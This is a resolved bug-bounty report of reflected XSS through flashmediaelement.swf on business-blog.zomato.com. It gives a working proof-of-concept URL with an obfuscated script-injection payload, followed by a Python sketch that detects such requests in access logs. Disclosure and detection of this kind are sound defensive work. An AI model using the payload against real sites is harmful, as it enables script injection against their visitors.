XSS in flashmediaelement.swf (business-blog.zomato.com)
Medium
Vulnerability Details
Hello __Team__
__Description__:-
business-blog.zomato.com is vulnerable to reflected XSS that stems from an insecure URL sanitization process performed in the file flashmediaelement.swf.
__POC__:-
https://business-blog.zomato.com/wp-includes/js/mediaelement/flashmediaelement.swf?%#jsinitfunctio%gn=alert%60xss by dem0n%60
{F154224}
__Fix__:-
Update WordPress to the latest version
__Regards__:-
Santhosh
Report Stats
- Report ID: 200351
- State: Closed
- Substate: resolved
- Upvotes: 4
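
A detection sketch for the request pattern in the POC above, added here as an example and not part of the original report: it flags access-log requests to flashmediaelement.swf and marks those whose URL carries a `%` that does not start a valid two-hex-digit escape. The function names, the common/combined log format and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# Flash fallback named in the report, under any WordPress install prefix.
SWF_PATH = re.compile(r"/wp-includes/js/mediaelement/flashmediaelement\.swf$", re.I)
# '%' that does not begin a valid two-hex-digit escape ("%#", "%g" in the POC).
BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")
# Client address and request target of a common/combined-format access log line.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def classify(target):
    """Classify a request target or full URL; None if it is not the SWF."""
    parts = urlsplit(target)
    if not SWF_PATH.search(parts.path):
        return None
    # A fragment never reaches the server, so an access log shows only the
    # query ("?%" for the POC); a full URL from a proxy log or a reported
    # link still carries it, so both parts are checked.
    if BAD_ESCAPE.search(parts.query) or BAD_ESCAPE.search(parts.fragment):
        return "malformed-escape"
    return "direct-request"


def scan(lines):
    """Return (client, verdict, target) for every log line that hits the SWF."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        verdict = classify(m.group(2))
        if verdict:
            hits.append((m.group(1), verdict, m.group(2)))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2017:10:00:00 +0000] "GET /wp-includes/js/mediaelement/flashmediaelement.swf?% HTTP/1.1" 200 2048',
    '203.0.113.8 - - [01/Jan/2017:10:00:05 +0000] "GET /wp-includes/js/mediaelement/flashmediaelement.swf HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2017:10:00:09 +0000] "GET /wp-includes/js/mediaelement/wp-mediaelement.css?ver=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2017:10:00:12 +0000] "GET /?s=100% HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for client, verdict, target in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{target}")
```

A `direct-request` hit is still worth reviewing, since it shows the SWF remains reachable on the site.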